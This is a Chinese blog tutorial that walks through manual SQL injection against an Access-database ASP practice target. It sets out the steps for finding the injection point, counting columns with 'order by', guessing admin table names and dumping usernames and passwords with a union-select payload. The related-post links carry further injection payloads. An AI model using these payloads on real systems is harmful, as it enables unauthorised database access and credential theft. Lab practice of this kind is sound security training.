首页 > 其他分享 >ACCESS手工注入靶场

ACCESS手工注入靶场

时间:2024-08-26 19:51:52浏览次数:10  
标签:asp 14 手工 admin 步骤 ACCESS 靶场 id view

步骤一:打开网页判断是否存在注入

判断注入点

news_view.asp?id=14' //报错

news_view.asp?id=14 and 1=1  //成功

news_view.asp?id=14 and 1=2  //报错

步骤二:判断当前数据库的字段文件...其到达8时页面置空,说明语句执行失败,当前数据库的字段
仅有7列

?id=14 order by 1

?id=14 order by 7

?id=14 order by 8

步骤三:判断回显的字段及猜测表名称在2与3位置可发现存在字段回显

表名可能有:admin, admins, admin_user, admin_usr ,admin_msg admin_login user username manager, administrator各种大小写变体

步骤四:猜解字段名在2与3位置上查询字段名这里只能考查不能考猜

union select 1,user_name,password,4,5,6,7 from administrator

步骤五:将获取的加密值解密

使用御剑查一下网站管理系统,第二个就是我们所需要的网站

双击这个打开,我们就可以知道管理系统的信息了

步骤六:ACCESS数据库注入过程基本靠猜..当然SQLMapYYDS;其下是整个显错注入流程使用到的语句…

标签:asp,14,手工,admin,步骤,ACCESS,靶场,id,view
From: https://blog.csdn.net/2301_81881972/article/details/141352965

相关文章

  • sqli-labs靶场通关攻略 31-35
    主页有sqli-labs靶场通关攻略1-30第三一关less-31闭合方式为?id=1&id=1")--+步骤一:查看数据库名http://127.0.0.1/less-31/?id=1&id=-1%22)%20union%20select%201,database(),3%20--+ 步骤二:查看表名http://127.0.0.1/less-31/?id=1&id=-1%22)%20union%20select%2......
  • MSSQL SQLi Labs 手工注入靶场
    less-1步骤一:判断注入方式 ?id=1'--+步骤二:判断后台是否是MYSQL数据库?id=1'andexists(select*fromsysobjects)--+步骤三:查询数据库信息,user回显的dbo表示是最⾼权限,如果是⽤户的名字表示是普通权限?id=-1'unionselect1,user,is_srvrolemember('public');-......
  • sqli-labs靶场通关攻略(31-35关)
    第31关(")闭合)查数据库?id=")unionselect1,2,database()--+查表?id=")unionselect1,2,group_concat(table_name)frominformation_schema.tableswheretable_schema='security'--+查列?id=")unionselect1,2,group_concat(column_nam......
  • 【跨域问题解决】Access to XMLHttpRequest at xxx from origin xxx has been blocked
    这个错误是由于浏览器的同源策略(CORS,Cross-OriginResourceSharing)导致的。当从一个源(origin)向另一个源请求资源时,如果这两个源的协议、域名或端口号不同,就会触发CORS策略。解决方法要解决这个问题,你需要在你的后端服务中添加CORS支持,以便它允许来自你的请求。这通常......
  • Access-Control-Allow- 设置 跨域资源共享 CORS 详解
    跨域访问的项目常在过滤器或者拦截器中添加如下配置   response.setHeader("Access-Control-Allow-Origin","*");response.setHeader("Access-Control-Allow-Methods","POST,OPTIONS,GET");response.setHeader("Access-Control-Max-Age&qu......
  • sqli-labs靶场通关攻略(20-40)
    第二十一关登陆后显示如下图界面,感觉和cookie注入有些相似进行抓包,发现cookie被编码返回来查看源代码,发现这里被base64编码我们将抓到的包发至重放器,在cookie字段写入查询代码并改为base64编码发送请求即可得到数据库名剩余操作大家自行查询第二十二关登陆后显示......
  • ACCESS Base64编码原理
    为了更详细地解释Base64编码的过程,我们可以从头开始逐步分解这个过程。假设我们有一段简单的ASCII文本"Hello",我们将详细展示如何将其转换为Base64编码。 1.获取文本的ASCII码首先,将"Hello"转换为其ASCII码值。每个字符的ASCII码如下:-'H'=72-'e'=101-......
  • sqli-labs靶场通过攻略(21~40)
    第二十一关这里用了base64编码加密进来可以看到来到在线加密把咱们的语句加密一下加密前:admin'andupdatexml(1,concat('~',(selectdatabase()),'~'),1)and'这是加密后的语句YWRtaW4nIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoJ34nLChzZWxlY3QgZGF0YWJhc2UoKSksJ34nKSwxKSBhb......
  • xss-labs靶场通关攻略
    第一关首先进入页面咱们直接来试试反射型 <script>alert(1)</script>直接就成功了然后开启第二关第二关进来后看见搜索框不知道它的闭合是什么样的咱们直接右击查看页面源代码去看看输入"><script>alert(1)</script>直接通过第三关这里输入语句发现错误来到页面源代......
  • 挂号信息管理系统设计(Access数据库开发的系统)
    目录摘要IAbstractII第一章绪论11.1研究工作的背景与意义11.1.1背景11.1.2意义11.2国内外研究历史与现状21.2.1国内外研究历史21.2.2国内外研究现状31.3本文的主要贡献与创新31.4本论文的结构安排4第二章系统分析与设计52.1系统概述52......